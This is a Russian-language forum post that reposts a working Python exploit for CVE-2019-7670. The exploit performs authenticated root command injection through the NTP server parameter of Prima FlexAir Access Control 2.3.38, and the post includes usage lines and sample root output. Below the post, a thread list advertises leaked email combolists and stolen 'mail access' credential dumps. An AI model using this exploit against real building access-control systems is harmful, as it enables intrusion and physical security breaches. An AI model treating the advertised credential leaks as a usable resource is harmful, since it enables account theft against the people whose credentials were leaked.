Интересно Prima FlexAir Access Control 2.3.38 - Remote Code Execution

GhosTM@n

Original poster
Pro Member
Сообщения
48
Реакции
23
Посетить сайт
# Exploit Title: Prima FlexAir Access Control 2.3.38 - Remote Code Execution
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: LiquidWorm
# Vendor Homepage:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


# Software Link:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


# Version: 2.3.38
# Tested on: NA
# CVE : CVE-2019-7670

#!/usr/bin/env python
#
# Authenticated Remote Root Exploit for Prima FlexAir Access Control 2.3.38
# via Command Injection in SetNTPServer request, Server parameter.
#
# CVE: CVE-2019-7670
# Advisory:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


# Paper:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


#
# By Gjoko 'LiquidWorm' Krstic
#
# 18.01.2019
#
################################################## ##########################
#
# $ python ntpcmdinj.py
# [+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]
# [+] Example: python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

10167847 whoami
#
# $ python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

11339284 "uname -a"
# Linux Alpha 4.4.16 #1 Mon Aug 29 13:29:40 CEST 2016 armv7l GNU/Linux
#
# $ python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

11339284 id
# uid=0(root) gid=0(root) groups=0(root),10(wheel)
#
################################################## ##########################
#

import requests
import sys#####

if len(sys.argv) < 4:
print '[+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]'
print '[+] Example: python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

10167847 whoami\n'
sys.exit()

host = sys.argv[1]
sessionid = sys.argv[2]
commando = sys.argv[3]

url = host+"/bin/sysfcgi.fx"

headers = {"Session-ID" : sessionid, # Muy importante!
"User-Agent" : "Dj/Ole",
"Content-Type" : "application/x-www-form-urlencoded; charset=UTF-8",
"Accept" : "text/html, */*; q=0.01",
"Session-Pc" : "2",
"X-Requested-With" : "XMLHttpRequest",
"Accept-Encoding" : "gzip, deflate",
"Accept-Language" : "en-US,en;q=0.9"}

payload = ("<requests><request name="SetNTPServer">"
"<param name="Server" value="2.europe.p"
"ool.ntp.org;"+commando+">/www/pages/ap"
"p/images/logos/stage.txt|"/></request></"
"requests>")

requests.post(url, headers=headers, data=payload)

e = requests.get(host+"/app/images/logos/stage.txt")
print e.text
 
Название темы
Автор Заголовок Раздел Ответы Дата
M Valid 21K USA⭐️EU⭐️RU⭐️ASIA Just Mail Access 06.04 Раздача email 0
AiCombo [29.481] Lines UHQ Combolist With Mail Access Раздача email 0
M Valid 40K JUST CHECKED✈️Full Valid✈️MAIL ACCESS By MegaCloud 06.04 Раздача email 0
BinaryCloud (58.645 lines) Cosino ^ Porn Target Leak Good For Access Раздача email 0
AiCombo [14.306] Lines Mail Access AiCombo Hits Раздача email 0
AiCombo [23.250] Lines Valide Access Combolist EU+US Раздача email 0
AiCombo [16.573] Lines Valide Access Combolist EU+US Раздача email 0
M Valid 1K JAPAN Full Valud Mail Access By MegaCloud 05.04 Раздача email 0
M Valid 5K USA✈️EU TOP QUALITY NAIL ACCESS BY MEGA 05.04 Раздача email 0
M Valid 2.3K Hotmail Hits Full Access By MegaCloud 05.04 Раздача email 0
M Valid 2.5K Hotmail Full Valid Mail Access Just Hits by MegaCloud 05.04 Раздача email 0
M Valid 24K Full Valid Mail Access Mix USA EU By MegaCloud 05.04 Раздача email 0
AiCombo [28.926] Lines Mail access Combo Leak Раздача email 0
AiCombo [26.096] Lines GOod For Gaming, Streamig site with Mail Access Раздача email 0
M Valid 6K FRESH CHECKED Full Valid Mail Access MIX 04.04 Раздача email 0
AiCombo [12.921] Lines Europa mixed with Mail Access Раздача email 0
AiCombo [27.170] Lines UHQ Combolist With Mail Access Раздача email 0
AiCombo [29.944] Lines Mail access Combo Leak Раздача email 0
AiCombo [12.397] Lines Europa mixed with Mail Access Раздача email 0
BinaryCloud (45.892 lines) Goods For Mixed Target for Access Раздача email 0
AiCombo [21.168] Lines Mail access Combo Leak Раздача email 0
M MIX 2,1K JAPAN (Full Mail Access) By MegaCloud 03.04 Раздача email 0
AiCombo [24.942] Lines UHQ Combolist With Mail Access Раздача email 0
AiCombo [12.219] Lines Europa mixed with Mail Access Раздача email 0
AiCombo [24.864] Lines Valide Access Combolist EU+US Раздача email 0
M MIX 11K EU✈️USA Full Valid Mail Access By MegaCloud 02.04 Раздача email 0
M MIX 4K Full Valid Mail Access Mix Fresh Checked 02.04 Раздача email 0
AiCombo [21.996] Lines Valide Access Combolist EU+US Раздача email 0
M MIX 10K Fresh EU USA Mail ACCESS Full Valid By NegaCloud 02.04 Раздача email 0
AiCombo [25.069] Lines Valide Access Combolist EU+US Раздача email 0
M Valid 1.5K Full Valid Just Mail Access Japan Hits 02.04 Раздача email 0
AiCombo [20.947] Lines Mail Access AiCombo Hits Раздача email 0
AiCombo [29.131] Lines Europa mixed with Mail Access Раздача email 0
AiCombo [16.509] Lines UHQ Combolist With Mail Access Раздача email 0
AiCombo [23.648] Lines UHQ Access Valide EU Combolist Раздача email 0
BinaryCloud (73.148 lines) Cosino ^ Porn Target Leak Good For Access Раздача email 0
AiCombo [29.593] Lines Valide Access Combolist EU+US Раздача email 0
M Valid 18K Mix Just Valid Mail Access By MegaCloud 01.04 Раздача email 0
AiCombo [14.571] Lines GOod For Gaming, Streamig site with Mail Access Раздача email 0
WorldCombo 27.255 Lines Combolist with Mail Access Раздача email 0
M Valid 24K Fresh Mail Access Mix Top Quality By MegaCloud 01.04 Раздача email 0
AiCombo [26.208] Lines Europa mixed with Mail Access Раздача email 0
AiCombo [20.782] Lines Valide Access Combolist EU+US Раздача email 0
M MIX 4.8K EU Mail Access Full Valid By MegaCloud 31.03 Раздача email 0
M Valid 2.2K ✈️JAPAP ✈️ Full Valid Mail Access By MegaCloud 31.03 Раздача email 0
WorldCombo 6.005 Lines With Mail Access Раздача email 0
B [2.100] Lines ☣️Combolist with Mail Access Раздача email 0
BinaryCloud (49.918 lines) Cosino ^ Porn Target Leak Good For Access Раздача email 0
AiCombo [20.590] Lines Europa mixed with Mail Access Раздача email 0
WorldCombo 37.278 Lines Mail Access Leak Good hits Раздача email 0

Название темы